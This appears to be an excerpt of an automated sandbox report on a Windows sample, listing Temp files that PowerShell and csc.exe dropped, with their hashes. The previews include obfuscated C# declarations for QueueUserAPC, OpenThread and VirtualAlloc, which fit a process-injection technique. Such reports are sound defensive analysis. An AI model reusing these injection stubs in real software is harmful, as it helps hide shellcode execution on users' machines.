                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0937098411846407
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryglcak7Ynqq7lxPN5Dlq5J:+RI+ycuZhNqlcakS7lxPNnqX
                          MD5:7BB8DBEA1D7CC9AE6DD3C9DDACDD5B05
                          SHA1:70F372DC7BEC4258A118B2994CF727706C637A6F
                          SHA-256:7E32817C8D9513A2384D66358662E876E51F86C98ED88DCEF8600E517D18EE4B
                          SHA-512:854DF89436FA8D435CFFA8AD3849731BDF6C1DC51ABCB702C67966E54952001EF34C86E6C44F4FB255A4B709C3E71DE9BBC99C82BDE9E997E39810C8F1B55B75
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                           Preview (decoded, one line per source line):
                           using System;
                           using System.Runtime.InteropServices;

                           namespace W32
                           {
                            public class yarnha
                            {
                            [DllImport("kernel32")]
                           public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);
                           [DllImport("kernel32")]
                           public static extern IntPtr GetCurrentThreadId();
                           [DllImport("kernel32")]
                           public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);

                            }

                           }
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.193724877080382
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fkosQoOUzxs7+AEszI923fkosQoM:p37Lvkmb6KzPxUWZE2PL
                          MD5:B5A546325FF70B405A6EDD0E5B93A5B0
                          SHA1:1E9346960956AE815C2BDA5EC359E6D535A870FE
                          SHA-256:D00CA81D76135390A9D1558CDE7562A4BE918C9DE9777A71881B6454A3ECE403
                          SHA-512:11A099697D3417B2E47DABAA93C85D5EE6B3096F48B44B1EE1B37A822EC78DC8B04AD599CFA641FAECB6FC951C9E0F5916A938BA84A09F026EEF36F00494BE6D
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6346506026861856
                          Encrypted:false
                          SSDEEP:24:etGSR8+mUE7R85z7woel/gXxp4/eiDPtkZf/mB5DZ0WI+ycuZhNqlcakS7lxPNnq:6nXE7S5gGBbiyJ/mBxZX1ulqaa37Bq
                          MD5:32F1B9D17FF5CE273F76E691A3957DA8
                          SHA1:3233B9F58DAA9DF48B43342EE29CC6AD6B8D4178
                          SHA-256:81BBAACB864F40359F08B4E22970E88F040D833B132CF5E48765A22CEE909384
                          SHA-512:D1B55F658650A21F57676944AE121C986A3FB3E6092FFACC61B59EDD5AFC7F695F6292C8AB281AF716B88DDAB7BCCAF2DC03D1BE27CEE8C992ABCC5904D87640
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.308132284793118
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzPx1E2PKKaM5DqBVKVrdFAMBJTH:Akka6aPx1E2PKKxDcVKdBJj
                          MD5:7E8A8641A737C70C899C4179EDDFC967
                          SHA1:3D6B8AB11FC9BF77D4395D19B1F8555B94768BB2
                          SHA-256:542B3D61A71514E012405F6DA07489BEEAEC5F0454D4CB25967E2BABCC896873
                          SHA-512:681789A5B72DA601257B45D36839BC0D1F422AE4B440D2A467ECD19552A2A8E00D8D686EE3B835508026643F184F955F221A4EBFC86DD02BDC111C966CEEC55A
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                           Preview (decoded, one line per source line):
                           using System;
                           using System.Runtime.InteropServices;

                           namespace W32
                           {
                            public class ufc
                            {
                            [DllImport("kernel32")]
                           public static extern IntPtr GetCurrentProcess();
                           [DllImport("kernel32")]
                           public static extern void SleepEx(uint ylpxxdj,uint gtjjej);
                           [DllImport("kernel32")]
                           public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);

                            }

                           }
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.2527558218035555
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f6LKafLXzxs7+AEszI923f6LKafLSn:p37Lvkmb6KzSOafrWZE2SOafGn
                          MD5:0E1A4FB543233681B29500DF56AA6F57
                          SHA1:8184927FBC93A8FCE2FD8CDCEC13AC2F88FB8306
                          SHA-256:EADB21BF3DAE2990213DE43C3E98CBAA88F21623B1B6A918BEE662FEEFB42507
                          SHA-512:8B62C9B1DE30ABD20A4C74F4D9697A9E681275136986C384D12084DE41FB94DC7FB8C843E9AF851B0576CF89C26D7A127FC9B966BCDC953F89C0F9F956BAAAFC
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"
                          C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.3183379397344765
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzSOafIE2SOafGuKaM5DqBVKVrdFAMBJTH:Akka6aSOeIE2SOeHKxDcVKdBJj
                          MD5:7241074EE55D01DA6C48E3A1DED01E88
                          SHA1:8221789569283A548A8860B38CE838E40150866B
                          SHA-256:FAF7AEF162FB9D7E43C8A189411C11D62BB1990731351E8520ED648937EE5A97
                          SHA-512:B7EF07709729A576FE4718BCA73B0CB499EBB5FEDF2323101207C6D4C5A9A41F64137EF3FA75F502B59CF391C85D65F5E70EB1AE0A46E787C83DC4A0268271BC
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.109921450738045
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydThak7YnqqsTGPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                          MD5:1DF567DCC97B0A7A089824364B677531
                          SHA1:F78BFB839164EEA3C6373359223DF1E347ABAAF3
                          SHA-256:E9775CAE51FE4CF3AE6BD9573077DBCB268034D0940A69E9E8020305F210E05E
                          SHA-512:EA75DC230C2B40003F3FB9ECBB6252FF72AFAC23751E0FA6C72C006A435CECCC93D70F245302BD2402B161D11FDE48F521138FDC6348DD7F8ECC8CEFAB23BC05
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                           Preview (decoded, one line per source line):
                           using System;
                           using System.Runtime.InteropServices;

                           namespace W32
                           {
                            public class yarnha
                            {
                            [DllImport("kernel32")]
                           public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);
                           [DllImport("kernel32")]
                           public static extern IntPtr GetCurrentThreadId();
                           [DllImport("kernel32")]
                           public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);

                            }

                           }
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.222902776745778
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fhQHgUzxs7+AEszI923fhQHs9:p37Lvkmb6Kz5QHDWZE25QHs9
                          MD5:06D22660044726226847AB9E405CDCA3
                          SHA1:0FB2A0C3CFCD8C7F2B1DDBB956ABDABBFA1CB06D
                          SHA-256:EE83EE6D67E2174D63373BE421E6411D81997D2C20B757074BED1C71EC273790
                          SHA-512:5A6F2E94B557B234CC1E12BF643048A3A797453ECF8885F6D44B8CD4B2415330C9C4A95E0CFEF4BEB30E5165CE630D4F0805195BD16BAE7FE6FA84374814475F
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6349672358126073
                          Encrypted:false
                          SSDEEP:24:etGSD8+mUE7R85z7woel/gx4/eiDPtkZfZzwLDZ0WI+ycuZhNtakS7PNnq:6BXE7S5gGjiyJZzwZX1ulta3xq
                          MD5:90EE0F91FF3E5AC8250C42785D163FB7
                          SHA1:13276BD1000D8F797C73C9B4BCA08127868C1EC9
                          SHA-256:E7251525735F9C3302CDE3DBF5F1796096283241712C20F38F5C4F64EA73070D
                          SHA-512:921B418BE5E4FC2F4D49CBCE1B323721E125F50C832A8E5A66037C7EB41230D29113DA342EF0A050A0DD9423A3AE96562D67682CF84D06DF77001A879A5B6E49
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.320077744261521
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzXE2V4KaM5DqBVKVrdFAMBJTH:Akka6aXE2V4KxDcVKdBJj
                          MD5:5D4927D1B228C0B04BE990A5CF5142D1
                          SHA1:BA0F046F862F9C11763D08A4CF8D3920EA250AD1
                          SHA-256:4C6B817FC7F440DE8C31AD988B1CCEA218531E2BCC2FDDBBF79F1AC6EA07E95E
                          SHA-512:94F287FF11ACB9E1772EF97E61C2B408DC85086F92DCBDECB69D6180F67EC2F3DCD7BAED33CCDB9E8F2CD507E458D07298962F8C62B481AEA9F39B293C0BDE9D
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                           Preview (decoded, one line per source line):
                           using System;
                           using System.Runtime.InteropServices;

                           namespace W32
                           {
                            public class ufc
                            {
                            [DllImport("kernel32")]
                           public static extern IntPtr GetCurrentProcess();
                           [DllImport("kernel32")]
                           public static extern void SleepEx(uint ylpxxdj,uint gtjjej);
                           [DllImport("kernel32")]
                           public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);

                            }

                           }
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.255365080899839
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fiVCWzxs7+AEszI923fiVCr:p37Lvkmb6KzKVCWWZE2KVCr
                          MD5:7C6E6D084FD264B37BCD7CC2BFAF1523
                          SHA1:197FBFFC51C699B27EB6EB0C914E044103B1503E
                          SHA-256:1EAA871B794C66E8F63C4EAC98E9110E562B64B2C81CE1F4B380ACF378EA0BB1
                          SHA-512:51B70D5DB9523935220EBD45501021056DEC17D6CFD1A016FF19060E8B5980E809F468D040F06ADBF8F013093301D2106286136F2F818153CC127E9AA3442277
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.335054980168907
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzKwnE2KwqKaM5DqBVKVrdFAMBJTH:Akka6aPE2iKxDcVKdBJj
                          MD5:D25692BE4A7B9E0D1859FED2E0B81B64
                          SHA1:5686819FE68A92F329686AEDF4CDD3CC8DA92609
                          SHA-256:D1260E5FC02624D38E533E5DB33FC83912F8A907509D4C1809BAB069CDDB8912
                          SHA-512:3560116FF740032B6B93CA22BDB32481B7CDEFEAC20A1577F1B95FD465B04F5281AED4F4DFD25C3B5CABEF38073ED50421991A8D62B3E22E7B62FE47CD62CB5D
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1139785671928237
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNoakS0PNnqX
                          MD5:74AC8729B044EF3E55CA0A024EFF165F
                          SHA1:CBFB0EA2703141E51FB43DA9F9288DA871566FB7
                          SHA-256:C9AF660105465928BE198DBDEB8D4BE5BA9D1B3048299AEB4CA1678D0E829480
                          SHA-512:E4B800C3568143FB841E0B86831C9ECFE1165EB81A17A885755C419CE4DA1E9CAEEA927893336E8F5F0EADACA2295DB5AA983F18D8E2E48A71846F4BFC87BFCA
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                           Preview (decoded, one line per source line):
                           using System;
                           using System.Runtime.InteropServices;

                           namespace W32
                           {
                            public class yarnha
                            {
                            [DllImport("kernel32")]
                           public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);
                           [DllImport("kernel32")]
                           public static extern IntPtr GetCurrentThreadId();
                           [DllImport("kernel32")]
                           public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);

                            }

                           }
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.28862302275331
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fPt10zxs7+AEszI923fPtdx:p37Lvkmb6KzMWZE2p
                          MD5:FEC723AE4CE1D4A72A48375DAE57F152
                          SHA1:7D0E0234A688710DE2AFE91CBDAA0F7EDC5449C4
                          SHA-256:AF7C1A6DBC10AA5EBB5D72297108D245410FB5FB55D48E3386E4799963732300
                          SHA-512:F018829EA6161344C82F9D46ADA4599BD8C86390DDA4048A59359DB7CC7DDCC052E55B8F893292408EE8D11F5C956A14B79279F119039E799C97D3B6EC77FA6C
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.64310436733059
                          Encrypted:false
                          SSDEEP:24:etGSR8+mUE7R85z7woel/gYp94/eiDPtkZfEPFXmSDZ0WI+ycuZhNoakS0PNnq:6nXE7S5gGYpXiyJmFXm0ZX1uloa3Uq
                          MD5:E78B4F20C9C3ECDFAADE20B23787EBCB
